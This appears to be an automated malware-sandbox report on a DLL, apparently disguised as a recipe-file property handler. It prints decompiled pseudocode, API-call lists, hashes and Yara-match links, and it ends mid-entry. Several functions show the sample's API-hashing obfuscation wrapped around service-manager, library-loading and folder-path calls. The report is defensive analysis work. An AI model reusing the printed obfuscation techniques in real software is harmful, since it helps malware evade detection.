                                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB), ref: 100015B5
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: ErrorLast$Read$QueryVirtual
                                                      • String ID:
                                                      • API String ID: 4108280708-0
                                                      • Opcode ID: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                                      • Instruction ID: a489c81f2b48b45f7abe8d82c2fa530717afe034d23ef7191f16fae001b152d3
                                                      • Opcode Fuzzy Hash: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                                      • Instruction Fuzzy Hash: 02415E71600619EBEB10CF59DC80B99B7A8FF483A5F04416AED0ADB705D731E961CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 1000A35A, Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E1000A35A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000476A( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000A179( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E10005EC6();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                                      0x1000a362
                                                      0x1000a367
                                                      0x1000a381
                                                      0x00000000
                                                      0x1000a381
                                                      0x1000a369
                                                      0x1000a36e
                                                      0x00000000
                                                      0x00000000
                                                      0x1000a373
                                                      0x1000a38e
                                                      0x1000a393
                                                      0x1000a396
                                                      0x1000a39d
                                                      0x1000a3bc
                                                      0x1000a3c3
                                                      0x1000a3c5
                                                      0x1000a409
                                                      0x1000a411
                                                      0x1000a420
                                                      0x1000a426
                                                      0x1000a428
                                                      0x1000a438
                                                      0x1000a438
                                                      0x1000a43c
                                                      0x1000a43e
                                                      0x1000a441
                                                      0x1000a441
                                                      0x1000a441
                                                      0x1000a441
                                                      0x00000000
                                                      0x1000a447
                                                      0x1000a42a
                                                      0x1000a42a
                                                      0x1000a42f
                                                      0x1000a42f
                                                      0x1000a432
                                                      0x00000000
                                                      0x1000a432
                                                      0x1000a3c7
                                                      0x1000a3ca
                                                      0x1000a3ce
                                                      0x1000a3f7
                                                      0x1000a3f7
                                                      0x1000a3fa
                                                      0x1000a3fa
                                                      0x00000000
                                                      0x00000000
                                                      0x1000a3fc
                                                      0x1000a400
                                                      0x00000000
                                                      0x00000000
                                                      0x1000a402
                                                      0x1000a402
                                                      0x00000000
                                                      0x1000a402
                                                      0x1000a3d0
                                                      0x1000a3d3
                                                      0x00000000
                                                      0x00000000
                                                      0x1000a3d7
                                                      0x1000a3ea
                                                      0x1000a3f0
                                                      0x1000a3f3
                                                      0x1000a3f5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000a3f5
                                                      0x1000a39f
                                                      0x1000a3a2
                                                      0x1000a3a4
                                                      0x1000a3a9
                                                      0x1000a3a9
                                                      0x1000a3ae
                                                      0x00000000
                                                      0x1000a3ae
                                                      0x1000a375
                                                      0x1000a37a
                                                      0x1000a37e
                                                      0x1000a37e
                                                      0x00000000

                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A38E
                                                      • __isleadbyte_l.LIBCMT ref: 1000A3BC
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A3EA
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A420
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                                      • Instruction ID: 9d1cf0849eee1a075b18554553a91368e22c05569ceb8c6a927f46b954fbfb1a
                                                      • Opcode Fuzzy Hash: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                                      • Instruction Fuzzy Hash: 6231B035A00256AFEB11CF65C848BAE7BE5FF822D0F124628F850871A4E770E9D1DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10006610, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 20%
                                                      			E10006610(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E10006C38(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E100042B0(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E10006E99(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E10006402(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E10004280(_t25, _t29);
					return _t25;
				}
				return _t25;
			}











                                                      0x10006610
                                                      0x10006610
                                                      0x10006613
                                                      0x10006618
                                                      0x1000661b
                                                      0x1000661d
                                                      0x10006620
                                                      0x10006623
                                                      0x10006624
                                                      0x10006627
                                                      0x1000662c
                                                      0x1000662c
                                                      0x1000662f
                                                      0x10006633
                                                      0x10006636
                                                      0x1000663b
                                                      0x10006638
                                                      0x10006638
                                                      0x10006638
                                                      0x1000663e
                                                      0x10006643
                                                      0x10006644
                                                      0x10006647
                                                      0x10006649
                                                      0x1000664c
                                                      0x1000664f
                                                      0x10006650
                                                      0x10006658
                                                      0x1000665d
                                                      0x10006661
                                                      0x10006667
                                                      0x1000666a
                                                      0x1000666d
                                                      0x10006670
                                                      0x10006671
                                                      0x10006674
                                                      0x1000667f
                                                      0x10006683
                                                      0x00000000
                                                      0x10006683
                                                      0x1000668a

                                                      APIs
                                                      • ___BuildCatchObject.LIBCMT ref: 10006627
                                                        • Part of subcall function 10006C38: ___AdjustPointer.LIBCMT ref: 10006C81
                                                      • _UnwindNestedFrames.LIBCMT ref: 1000663E
                                                      • ___FrameUnwindToState.LIBCMT ref: 10006650
                                                      • CallCatchBlock.LIBCMT ref: 10006674
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                      • String ID:
                                                      • API String ID: 2633735394-0
                                                      • Opcode ID: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                                      • Instruction ID: 929118807ddd2d015550d77d84a67e82c7ccc00f3a1cd5c495e14181e13c7b39
                                                      • Opcode Fuzzy Hash: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                                      • Instruction Fuzzy Hash: D6014C72000109BBEF02CF55DC01EDA3BBAFF5C790F228119F91862124C732E961DBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 100032A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • StringFromGUID2.OLE32(?,?,00000027), ref: 100032CF
                                                      • GetModuleFileNameW.KERNEL32(10000000,?,00000104,?,10002572,1000D260,80000002,5DA49213), ref: 100032E3
                                                      Strings
                                                      • Recipe (.recipe) Property Handler, xrefs: 100032A6
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: FileFromModuleNameString
                                                      • String ID: Recipe (.recipe) Property Handler
                                                      • API String ID: 1402647516-129706424
                                                      • Opcode ID: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                                      • Instruction ID: 6f8015bcf9db97dc62130dd9dbc2d8b03967e6a2f427fd85d2ca8f80d55362ab
                                                      • Opcode Fuzzy Hash: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                                      • Instruction Fuzzy Hash: 7AF01231510718AFD310DFA8C844E96B7E8EF09754F00851BF689D7610E7B0A544CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10001980, Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E10001980(void* _a4) {
				void* _t15;
				void* _t16;
				void* _t20;
				intOrPtr _t23;
				void* _t30;
				signed int _t32;
				void* _t34;
				void* _t35;

				_t34 = _a4;
				if(_t34 == 0) {
					return _t15;
				}
				if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
					_t30 =  *(_t34 + 4);
					 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
				}
				if( *(_t34 + 8) == 0) {
					L10:
					_t16 =  *(_t34 + 4);
					if(_t16 != 0) {
						VirtualFree(_t16, 0, 0x8000);
					}
					return HeapFree(GetProcessHeap(), 0, _t34);
				} else {
					_t32 = 0;
					if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
						L8:
						_t20 =  *(_t34 + 8);
						if(_t20 != 0) {
							VirtualFree(_t20, 0, 0x8000);
						}
						goto L10;
					} else {
						goto L5;
					}
					do {
						L5:
						_t23 =  *((intOrPtr*)( *(_t34 + 8) + _t32 * 4));
						if(_t23 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x24))))(_t23,  *((intOrPtr*)(_t34 + 0x28)));
							_t35 = _t35 + 8;
						}
						_t32 = _t32 + 1;
					} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
					goto L8;
				}
			}











                                                      0x10001984
                                                      0x10001989
                                                      0x10001a09
                                                      0x10001a09
                                                      0x1000198f
                                                      0x10001993
                                                      0x100019a0
                                                      0x100019a0
                                                      0x100019a6
                                                      0x100019e2
                                                      0x100019e2
                                                      0x100019e7
                                                      0x100019f1
                                                      0x100019f1
                                                      0x00000000
                                                      0x100019a8
                                                      0x100019a9
                                                      0x100019ae
                                                      0x100019cc
                                                      0x100019cc
                                                      0x100019d2
                                                      0x100019dc
                                                      0x100019dc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x100019b0
                                                      0x100019b0
                                                      0x100019b3
                                                      0x100019b8
                                                      0x100019c1
                                                      0x100019c3
                                                      0x100019c3
                                                      0x100019c6
                                                      0x100019c7
                                                      0x00000000
                                                      0x100019b0

                                                      APIs
                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019DC
                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019F1
                                                      • GetProcessHeap.KERNEL32(00000000,EC8B55CC,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100019FA
                                                      • HeapFree.KERNEL32(00000000,?,10001DC4), ref: 10001A01
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Free$HeapVirtual$Process
                                                      • String ID:
                                                      • API String ID: 3505259878-0
                                                      • Opcode ID: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                                      • Instruction ID: 46a294df184e67868fe018602a73977999fd3160e39f49d8b46b80fbf7fdd7f8
                                                      • Opcode Fuzzy Hash: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                                      • Instruction Fuzzy Hash: 1E115A31600711ABE620DBA5CC89F9673E8EB48BD1F108818F59AD7294CB70F841CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: rundll32.exe PID: 2712 Parent PID: 2824 rundll32.exeCOMMON

                                                      Executed Functions

                                                      Function 001E2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E001E2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001E602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001F07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                                      0x001e295f
                                                      0x001e2964
                                                      0x001e2967
                                                      0x001e296a
                                                      0x001e296d
                                                      0x001e296e
                                                      0x001e296f
                                                      0x001e2977
                                                      0x001e2985
                                                      0x001e298a
                                                      0x001e2992
                                                      0x001e299a
                                                      0x001e29a2
                                                      0x001e29a9
                                                      0x001e29b0
                                                      0x001e29b7
                                                      0x001e29bb
                                                      0x001e29cf
                                                      0x001e29dc
                                                      0x001e29e2

                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001E29DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: f29e54dee73b85a96df9d17acf58ceeec97b552066db9f924e08f68ae3473b75
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: 19018072A00108BFEB14DF95DC0A8DFBFB6EF48750F108088F508A6250D7B65F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001EC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001EC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001E602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001F07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                                      0x001ec6e1
                                                      0x001ec6e6
                                                      0x001ec6f0
                                                      0x001ec6fc
                                                      0x001ec703
                                                      0x001ec706
                                                      0x001ec70d
                                                      0x001ec711
                                                      0x001ec715
                                                      0x001ec71c
                                                      0x001ec723
                                                      0x001ec72a
                                                      0x001ec731
                                                      0x001ec738
                                                      0x001ec751
                                                      0x001ec762
                                                      0x001ec768

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001EC762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 6944b5eda7ddc599a285dfadfb83d98871e35aac18c3631d2d2e62f16343f5b4
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: DC1133B290122DBBCB25DF95DC498EFBFB8EF14754F108188F90962220D3714B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001E1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E001E1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001E602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001F07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                                      0x001e1006
                                                      0x001e1009
                                                      0x001e100c
                                                      0x001e1011
                                                      0x001e1016
                                                      0x001e101d
                                                      0x001e1026
                                                      0x001e102d
                                                      0x001e1034
                                                      0x001e103b
                                                      0x001e1047
                                                      0x001e104f
                                                      0x001e1057
                                                      0x001e105e
                                                      0x001e1065
                                                      0x001e106c
                                                      0x001e1073
                                                      0x001e1077
                                                      0x001e108b
                                                      0x001e1096
                                                      0x001e109b

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 001E1096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: e6c4d22095a37846949824c43428ebcba9464efa8f5f78c7bbe982629098abf5
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: 96015BB6D0170CBBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001E4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E001E4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001F07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                                      0x001e485e
                                                      0x001e487a
                                                      0x001e487d
                                                      0x001e4884
                                                      0x001e488b
                                                      0x001e4892
                                                      0x001e489d
                                                      0x001e48a0
                                                      0x001e48ad
                                                      0x001e48b7

                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 001E48B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: db10be173d78d936ff7409dc4a61335d5f4ce6dd59e8ceb58d4ae770844ed64b
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 6FF0F4B0A05209BBDB04CFE8CA5699EBFB9AB40301F208188E444A7290E3B15F509A50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001F4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E001F4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001F07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                                      0x001f4f80
                                                      0x001f4f81
                                                      0x001f4f82
                                                      0x001f4f86
                                                      0x001f4f87
                                                      0x001f4f8c
                                                      0x001f4fa5
                                                      0x001f4fa8
                                                      0x001f4faf
                                                      0x001f4fb6
                                                      0x001f4fc7
                                                      0x001f4fca
                                                      0x001f4fd7
                                                      0x001f4fe2
                                                      0x001f4fe7

                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 001F4FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: 3a5fbf3e33bfcad55dc1fab4b82b1efc569f49ed361eebb7fe294ba9cd13fcc4
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 50F037B081120CFFDB04EFA4D94289EBFBAEB44340F208299E804AB261D3715B509B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001F976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 21%
